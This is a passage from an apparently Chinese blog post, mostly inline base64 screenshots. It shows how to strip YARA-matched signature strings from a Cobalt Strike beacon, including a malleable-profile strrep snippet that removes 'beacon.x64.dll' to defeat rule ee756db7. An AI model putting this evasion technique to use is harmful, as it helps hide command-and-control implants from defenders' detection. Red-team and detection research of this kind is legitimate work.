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
</p>
<p>再次使用yara检测发现字符串匹配特征已经少了很多，但是还有一些存在</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>既然profile中的特征已经去除了，那么剩余的规则要么在原始beacon.dll中存在，要么就是生成的exe时出现的特征，先看看原始beacon.dll吧，使用yara单独对文件进行检测，可以明显的看到，确实是在原始beacon.dll中存在的特征</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>针对这种情况，CobaltStrike提供了可以从profile中使用strrep来替换指定的字符串，把其中的一个特征替换为空</p>
<pre tabindex=0><code>transform-x64 {
    strrep "beacon.x64.dll" "";
}
</code></pre><p><img loading=lazy src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABbgAAAMGCAIAAAC/LnVKAAAgAElEQVR4nOzdd3wcZ50/8O8zM1u1WvXeq2V125KLJPcWx04lPUDCkcAlwAEJd5QfRw+EEiAQAkdykHAQh5BAHMc1tuPebblbklWs3qXVSto+8/z+WFleSStZ1sqWnHzeL7/upNmZ5/nO8zxCma+eeR6WNTeXBnBFISLOiHGuEBG/8h0RJ86IiPMrhzlnRJxzzokYERFjxDmxgXOIMXeRxIlo4JSBrwdOJs8TOBFxhRPnXOGyzBWnLMuK7FBkhXOZyzKXFc45KYrCOXFOxPlAHFcKcX9JxAa/ulofEfeIwTMYNvB/BBIYExgTmCAJTBCYyARBEBgjYkxggseFV/7faNhgxR41Mu6OjIhd6/qB1hjx3ZXbutoJRJwc/YGBoWOUdce6lSe2vqTWkMQZZ4KW8YRIvv2UEJPOGaN0u9gdmHWx/PTXv85jj4vqvKceffGDa4UHAAAw1XRJi9YVBDUc2na4wcavcS4zZqy4PdNyaMOBWvmap9kOb9x32UlC+Ow7Fse37N1wpNWjeOaXsXTtLOn8lg/OmzwOez95zPIBAABuKX19PZzLkqQe5/kup5MJgsEQMI3KEQWDIZDcz+kDCQsydXeoDTFEjBNjTGAC45wxgdjc5HnuVMWV53mluqd+MNUAAAAAAAAAAPARwxiTZZdOSBNIcKdHGImMEScmtYcMzsHgloYWjVYfGBTG2DVnPQAAAAAAAAAA3JI45y6X025rtEpxnIgYY4wzEogxKbS/n3PixFt6bQb/wKkOFQAAAAAAAADgxmKMqVRqlUpts7Zwpz8RY0wgIoEJUjcLJEa9nXXIkgAAAAAAAADAx4pW59fn6nJSGhEjJjAmSAZVK3FyaPVTHRsAAAAAAAAAwM2m0eoFRxMxYWA7F6c5rK6hV5JUUx0YAAAAAAAAAMDNJkkqu73bZYuU7VGyLUpyBnZxE8fqrQAAAAAAAADwMcQY45yTvkthgsBI6q6WSZjqoAAAAAAAAADgVuNw2Gy2fqfDIcsyEYmiqFKrtVo/tVp7y5Uj9fsxJjDGJJO936Abb5WcKyOOMcxGAQAAAAAAAPhYkV0us7lTUWRJUmk0OkFgRKQoXJadveYuQRCNxhBRkm6hcqx+nDGFSGCSFOZvFIJDIq5Z64MP3Pvcj7477GB3d/ezX/vW3n0Hr3k5AAAAAAAAAHwEOJw2s6lLpVarJLXXE5xOh9NpNwaEqtWaW6Kcrs5WrRjNBEbEBM7Hu4xrWFjoyIMGg+E3L/586ZKF4ywEAAAAAAAAAG5dsstlNnWqNdrRshJEpFKp1RqduadDdrlulXJsYqCFBVqFIFEQJI1W1OkNo506aO7cOfPnzx12UFEURVFWrlzW0dF58WL5NQsBAAAgYn7Z6z7zicWFhXMK5xYUFs4Z/FeQa2w/c7mHT7TMe9Lt5ZfaHFJg0qySpYsWLZxXmJ+ZFme0NTd0271cIwTm3/v47XGms1VdI98tHX5aovl8Zac88kNj4pwlyxeWFM8vzJ+ZGqMx1zebR/39S0TEQvLueXhlsr2mypk5erEjq5m57pP3LInpP3fJ82wxILlw+aolC4vm5KaGit1NLb1D6ma6iJlFy9euylbVljVZyaOVqm3Rs68rbB94ds3AIVX6qifuz5YvVbR46xdmTCq57bYViwoyDJ3lteax+oaIrtFBk8Ajnr7+qKKV+dq2ylZbgG+VqlPXPPGJxVHWiksdzsGKgmff/9i6Obrmc3V9E/khmFRj9xEAAHyc9ZjaJUmlutbmuYIgMCKb3aLTeU84TKtyrNZ+jUqWhH6J9UkqKYDIOnZxY3AnShhj3/j6M/39/Vu37ZxwUQAA8LEhRUaHsa4Lu4+3KiJjgWlFs8O7Th+82Mm50ttxzcdiIhKCZi4qiOo4+eG5zivPk1JkdBjrPt1sEYLzbru7KNLVVHH+aKeFqwOCFKtl8p46h1YthM1evTpf23Su9EC3S20I9u+32Li38K5iLkd/v8XhGM99Dl5jSF9YGKNhw64RI+asWZWllB/bd4rF5s0pXLPY8ub2sn5ORMQ0ETnFiwtTgjWM8c4rVwy0Uos+30vYN8pg14yvCqZNLVqc5Vd3cFe1ubfzurM3Yzb+RHjG09eryjYajXr15KzPxtRxObkRlw61uO9SnZCfGSJQ/6SUDQAAcGM4HDZFkTWaca11Kqk0Tmufw2Ef+cLLdCuHiFz2CMYERoKkCRDIh78gaTSajo6OlpYWIlq+bDESJQAAcG1CWEyk2F9dXVHVrBAJUWGFc0LNjZUVdePPHehC4hLj2UVGxIeU2dytS72tMMpVsePtXTWTmB4ZpWpmiI4JFrpPHDxyxvOpnI0Iz4PSc3H73y8SkRA4zhqZX3rRPP+mmo7EhKHHA+PjApTGXfvPXXJSVZc2/L7c9CR9+bl+TkTcRZLYc/7DA9bUtUV+A1dcaSU5aq6XsG+Qwa4Zb/f6BQZKztbKC1V1E5qqMVbjT8jQeFrfqCQimqQ9A1nAzFnJp7dWWDgxY3peis7LuvkAAADTic1mka41d8OTJKpttv6RiYnpVg4RkbabM4GIJNGm45JPf7qIiYnhnLe2tvpSCAAAfHywoKgIvbO5cbS5I2JgSkFRQWqUUbS0VR3fc7iyPzhr4YLcxFCDpNjaz2x770LQmjU5/oxm3v759Ibdf9ly0coHy5Sis6Ol/rKLtSOyJEwflbNgQWZciFYxN5cfOXjscq+7upDsVQ8tCtc5uqqP7T1QblKCZyxamBsf4q8ha0ftqf17L3ZeLUObcfuQqqt7ex2UkrdiuXCmvOpyY6dVGXlOuSbvngdSO080GWemBnce+cdh3W0PzrHt/dvmpiulqqMX3HtbFj///r9OWOPmeN77JZPM/FJK5gdV79phLhyWKCG71a4IIfGJxtpaJTgiUM0FKdCfkXtKidx68oNtRKr05BEt32lhI8L21vJVlHM18q4L5Zq8PN3Zf60/2sql+CUPrYmp2rD+qC1p9Es6j/xja7nlaneLxuTCxfPTIvRydy+xgZkTwyo9o1l8T0GwQMG3fS7dUXXsmCMmc0hfhBd/8s6ky++/sbeeooofvDOzdfufdtWO3kEXrVcyaYH599wX337OEpkR6yd3Vx/dc6DcpATmD422gkcOHSS1cuadV+Op2PpGTdonV4We/+f6Ix1jDtpLpvEkeXh3U6s6Pjc7rPJoG4vMzQrtqG0ISAgeY8TGeLn9y0LYkB+QDSdbFW9dOfL2Rwz1dqfXPgIAALjK6bCPc/qGmyiKdoeXt1imWzlEJFn0RExgguDQTsJfLmJjY8PCwnwvBwAAPgaYPioqSGlravE+oVGMLLhtRRq7tG/T+/sui2lLlmZFpBcWpfu1H93+3vs79h6t6VLstYcOVVu4/fKhDRsO1tq5Z5lavV4ku80+PE0iBGSuWDcvxlF5eM+xamfErFXL84IHXp8Q7S2l+45W9AVmLFmaG8K4rbf98vnDu3d9eKJFnVq0MMdj4gcfXrW95vCO4w02Y9LspWvu//QjdxcnGNjI8IiEoIycsL7K86fKmq3DQmP65MVLcvTNh7YdawueM/TeM42CPrl4Xlj94aMNzhHzI3hf+bGTraq0FQ999rMPrUpV2+WxJ1EMtpLTS9jCyJbPNAoekV+sPFvRLBvj44MZSZGJCdruSxUd4WNeUtZs5Ve7RgjOWbkyJ8h8cf+e0iabwLx3d3LHgb1lZu6oO7zh3S3HqruH9cU1XnkZ0UFDPpUiEkJNZw4cKTMbM5YszQthw7vGOGKQBNmr91+N50ST9/SHl6Yb17s53FF/5kKXMSs/Ue+XMmuGVH2qovdKyGOM2GHdqksb+gPCR+nKEbc/cqh77SMAAABPsiwL1/MrQhAFWfGSdphu5RCRTafYdIpVJ0sap0Px7ddg54YN7a+9pvT0aHV6I1fMbHLmogIAwEeUKiI6lHWWNo3IZRARETNGRwcIWkP+kjX5xESVYPUTWmobrQtSFq6K6W6tOXe8pY
</p>
<p>再次生成beacon，运行发现ee756db7规则直接就消失了</p>
<p><img loading=lazy src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABoQAAAGcCAIAAAB/YVXxAAAgAElEQVR4nO3du5LjONYAaPbGvs0YY46bj5YP1EabbcrM38uJyHmeWkPRXBYvh7jyIn2fUVESiYNDEAIlJCgNP99fP99fn5+fHx8fAwAAAADQ1M/3169fv57//j9nJwMAAAAAr+xf//7P//77f89/TcYBAAAAQEfjTNy//v0fk3EAAAAA0JGVcQAAAABwECvjAAAAAOAgVsYBAAAAwEGsjAMAAACAg1gZBwAAAAAHsTLuQh6Px+PxOL4sAP282/h8zeO9ZlaXpblO5xQAwGubroz7f1f3mL4V+Pj4SIz7LLW1/3JrvP8xEnNou9vp+uXZI3JKv5pqVXvKsVzweMtevIlZLfXu7XccVc4VdIA7Ns4051n+u32y02thmdiRuh5UJ2VtdZ3X/hVeOGeNwL31eLdZX2n6VXi5z/HvCi4rGL3Tiz9ttXOPrQDQ1c7KuNl7Pn+jG1ugR1N8fHwUvxWoKfvC3q3HvtvxXsQ11y+kj97XzP+V9Bifr3x1vub16JpZXdbBzXXl/ryld8567FPczv0eAkBv0XfGjZel6RuCxGvV9M9fd7Gb8/jXvDse3WtIafmPfzwf3vo0ZR3vcudOb+VnLTx72M9lX3cXTKxm9L6vj4XZphNza+vdzu8FX2InOmsE7ufE/lzcdO/2GjxL3M79tgLAAaYr49ZvU52+4TswscKF5eN82eyCutxnK3Kcz7Q1nstJViPPws6yev4nMaXlEa3uEBzObvDVzHdbMmjhOHKcVcoZTLQMEtSbsnWZ5LJg/fEe80JLubGr5vaNlF633Lr7SqmRXu9yn93euDogDAnt3DurrU2Vdvvz7jMFic0m1/IyDu22ZNkoGhdM3CFFQeSyM5jVJ4NKgytOkEmxmivsarYpwXuPsVvq3wU1Gb1XI8fi8Sr9pZSe867dK3sQttX7qzjh1ZdJk3e5y2dqrlbFo/ds51kV8dZlDrlla/R4dQPwYjr+mur0vXuuWamsh3GlcdlWOa9GmL0zy6plN3hKwdyyWfu3zSqIdmK/mj5f9oZ+K3JwfmuOt0ZNz8kqG7TG8pXSsDWyel3Knk1ya55VD+n9efdwju/YKcpGhuYVBbY+HidGPuy60FDK6+vxeDS/fMcX38PGyVzF74Iqayl+r5JVUU29rbLafQ3uqs9kdyauSS1x7cfUNati6w1YynvvOHJWJjNBtGte6QA43f7KuF0FcxO5AZ/Xudl78enDx9ryma0/VG5